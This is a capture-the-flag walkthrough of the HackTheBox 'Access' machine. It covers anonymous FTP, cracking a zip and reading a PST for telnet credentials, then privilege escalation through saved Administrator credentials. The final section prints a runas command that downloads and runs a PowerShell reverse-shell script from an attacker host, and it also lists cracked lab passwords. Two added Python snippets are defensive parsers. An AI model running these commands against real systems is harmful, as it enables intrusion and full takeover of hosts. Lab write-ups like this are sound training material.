The Access machine runs an FTP service hosting a password-protected zip file that eventually leads to the telnet credentials.

The machine has stored Administrator credentials, which then lead to privilege escalation.


Part one: User

Reconnaissance

Begin with an nmap scan to find open ports.

Command options:
-sC runs the default scripts
-sV enumerates service versions
-oN saves the scan in normal format

nmap -sC -sV -oN access 10.10.10.98
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.10.10.98
Host is up (0.072s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.52 seconds
  • port 21 (ftp) — the ftp-anon script indicates that anonymous login is allowed.
  • port 23 (telnet)
  • port 80 (http) — Running a Microsoft IIS server.

HTTP — Port 80

The website:

The website serves what looks like a network camera feed, but it seems to be a static image.

I tried to find other directories using gobuster:

Nothing interesting.

FTP — Port 21

Connecting anonymously without a password:

Searching for interesting files and transferring them to my machine:

ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************| 10870       50.67 KiB/s    00:00 ETA
226 Transfer complete.

Found two files:

  • backup.mdb
  • Access Control.zip

A file with the MDB extension is a Microsoft Access database file; MDB literally stands for Microsoft Database.

Trying to unzip the zip archive:

unzip Access\ Control.zip
Archive:  Access Control.zip
   skipping: Access Control.pst      unsupported compression method 99

After searching about “unsupported compression method 99”:

WinZip uses AES encryption to password-protect zip files, which the unzip binary does not support. (source)

However, the 7zip package can extract files from a WinZip AES archive.

7z x Access\ Control.zip
Enter password (will not be echoed):
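
To see what “compression method 99” actually is before reaching for 7z, here is an added Python example (not from the original post) that walks a zip file's local headers and decodes the WinZip AES extra field (ID 0x9901), reporting the key size and the real compression method hidden behind method 99. The archive bytes are constructed inline; this is not the Access Control.zip from the box.

```python
import struct

LOCAL_HEADER_SIG = 0x04034B50
AES_METHOD = 99          # "compression method 99" = WinZip AE-x encryption marker
AES_EXTRA_ID = 0x9901    # extra-field ID that carries the real AES parameters
AES_BITS = {1: 128, 2: 192, 3: 256}

def parse_aes_extra(extra: bytes) -> dict:
    """Find the 0x9901 field: vendor version, 'AE', key strength, real method."""
    pos = 0
    while pos + 4 <= len(extra):
        hid, size = struct.unpack_from('<HH', extra, pos)
        if hid == AES_EXTRA_ID and size >= 7:
            _ver, vendor, strength, real = struct.unpack_from('<H2sBH', extra, pos + 4)
            if vendor == b'AE':
                return {'aes_strength': AES_BITS.get(strength), 'real_method': real}
        pos += 4 + size
    return {}

def parse_local_headers(data: bytes) -> list:
    """Walk the local file headers and report each entry's method/encryption.
    Assumes sizes are in the header (no data descriptors), as WinZip writes them."""
    entries, pos = [], 0
    while pos + 30 <= len(data):
        (sig, _ver, flags, method, _t, _d, _crc, csize, _usize,
         nlen, xlen) = struct.unpack_from('<IHHHHHIIIHH', data, pos)
        if sig != LOCAL_HEADER_SIG:
            break                          # reached the central directory
        name = data[pos + 30:pos + 30 + nlen].decode('utf-8', 'replace')
        extra = data[pos + 30 + nlen:pos + 30 + nlen + xlen]
        entry = {'name': name, 'method': method, 'encrypted': bool(flags & 1),
                 'aes_strength': None, 'real_method': None}
        if method == AES_METHOD:
            entry.update(parse_aes_extra(extra))
        entries.append(entry)
        pos += 30 + nlen + xlen + csize
    return entries

def build_entry(name: bytes, method: int, flags: int, extra: bytes, body: bytes) -> bytes:
    """Constructed local header + payload for the sample archive below."""
    hdr = struct.pack('<IHHHHHIIIHH', LOCAL_HEADER_SIG, 20, flags, method, 0, 0, 0,
                      len(body), len(body), len(name), len(extra))
    return hdr + name + extra + body

# Constructed sample: one WinZip AES-256 entry (real method 8 = deflate) and one
# plain deflate entry; this is not the archive from the FTP server.
AES_EXTRA = struct.pack('<HHH2sBH', AES_EXTRA_ID, 7, 2, b'AE', 3, 8)
SAMPLE_ZIP = (build_entry(b'Access Control.pst', AES_METHOD, 1, AES_EXTRA, b'\x00' * 16)
              + build_entry(b'notes.txt', 8, 0, b'', b'\x01' * 5))
```

Running parse_local_headers over a real archive tells you up front whether unzip will fail on it and how strong the encryption is, which is the triage step before any extraction attempt.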

The zip is password-protected, so I used zip2john to produce a hash that can be cracked offline.

zip2john Access\ Control.zip > zip.hash

Attempted to crack it using rockyou.txt:

john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

Failed.

Although I only got part of the backup.mdb file, I extracted its strings to use them as a wordlist and hopefully crack the WinZip password:

strings backup.mdb > zip_wordlist

It worked! The password for the zip is access4u@security.

Extracting the zip file using 7z:

7z x Access\ Control.zip

Getting information about the extracted file using the file command:

file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

The PST extension is used for Outlook personal storage.

Using readpst to convert it into an mbox file so I can read the contents:

readpst Access\ Control.pst
file Access\ Control.mbox
Access Control.mbox: HTML document, Unicode text, UTF-8 text, with very long lines (516)

“Access Control.mbox” is now a readable file.

cat Access\ Control.mbox | grep password

Got credentials: security:4Cc3ssC0ntr0ller. Let's check them using telnet.

Telnet — Port 23

Owned user!


Part two: Root

Reconnaissance

After enumerating basic information, I found that Administrator credentials are stored.

Using runas /savecred, it is possible to run commands on behalf of the Administrator without supplying a password.

This can be leveraged to create a reverse shell.
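
As a defender-side counterpart to the technique above, here is an added Python example (not from the original writeup) that parses the text of Windows Security Event ID 4648, which records explicit-credential logons such as a runas invocation, and flags cases where one account used a different, privileged account's credentials. The section and field names follow the real 4648 message layout; the sample events and the PRIVILEGED set are constructed assumptions for this example.

```python
# Accounts whose credentials should never be used via runas by another user
# (assumption: site policy; extend with local admins, service accounts, etc.).
PRIVILEGED = {'administrator'}

def parse_4648(message: str) -> dict:
    """Parse the message body of Security Event ID 4648 ("A logon was attempted
    using explicit credentials") into {section: {field: value}}. Section headers
    are unindented lines ending in ':'; fields are tab-indented 'Name:<tabs>value'."""
    sections, current = {}, None
    for line in message.splitlines():
        if not line.strip():
            continue
        if not line.startswith('\t') and line.rstrip().endswith(':'):
            current = line.strip().rstrip(':')
            sections[current] = {}
        elif current is not None and ':' in line:
            key, _, value = line.strip().partition(':')
            sections[current][key.strip()] = value.strip()
    return sections

def explicit_privileged_logons(messages) -> list:
    """Alert when one account uses a different, privileged account's credentials;
    this is the trace a 'runas /user:... /savecred' invocation leaves behind."""
    alerts = []
    for msg in messages:
        ev = parse_4648(msg)
        caller = ev.get('Subject', {}).get('Account Name', '')
        used = ev.get('Account Whose Credentials Were Used', {})
        target = used.get('Account Name', '')
        proc = ev.get('Process Information', {}).get('Process Name', '')
        if target.lower() in PRIVILEGED and caller.lower() != target.lower():
            alerts.append(f"{caller} -> {used.get('Account Domain', '')}\\{target} via {proc}")
    return alerts

def sample_4648(caller: str, target: str, proc: str) -> str:
    """Constructed event text following the 4648 layout; all values are made up."""
    return ("A logon was attempted using explicit credentials.\n\nSubject:\n"
            f"\tAccount Name:\t\t{caller}\n\tAccount Domain:\t\tACCESS\n\n"
            "Account Whose Credentials Were Used:\n"
            f"\tAccount Name:\t\t{target}\n\tAccount Domain:\t\tACCESS\n\n"
            "Process Information:\n\tProcess ID:\t\t0x1a4\n"
            f"\tProcess Name:\t\t{proc}\n")

SAMPLE_EVENTS = [
    sample_4648('security', 'Administrator', r'C:\Windows\System32\runas.exe'),   # the escalation path
    sample_4648('security', 'security', r'C:\Windows\System32\runas.exe'),        # same account: benign
    sample_4648('Administrator', 'Administrator', r'C:\Windows\System32\svchost.exe'),
]
```

The durable fix is to remove the saved entry from Credential Manager (cmdkey /list shows what is stored for the current user) rather than to rely on detection alone.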

Reverse shell

For the reverse shell I used Invoke-PowerShellTcp.ps1 from the nishang collection.

I downloaded the ps1 script and served it using python.

python3 -m http.server 8000

Started listening on port 4445 using nc:

nc -lvnp 4445

Used runas to execute, on behalf of Administrator, a PowerShell command that downloads and runs the Invoke-PowerShellTcp.ps1 script and connects back to my local port:

runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object net.webclient).downloadstring('http://10.10.14.20:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 4445"

Checking the call back on the nc window:

Got shell as Administrator!

Thanks for reading :)

